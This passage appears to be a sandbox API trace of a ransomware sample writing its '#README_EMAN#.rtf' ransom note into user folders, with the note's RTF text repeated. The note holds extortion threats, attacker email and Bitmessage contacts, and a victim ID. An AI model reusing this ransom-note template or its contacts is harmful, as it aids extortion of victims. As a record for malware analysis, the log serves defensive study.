;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.726] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.726] CloseHandle (hObject=0x2cc) returned 1 [0283.727] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0283.727] GetLastError () returned 0x2 [0283.727] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER 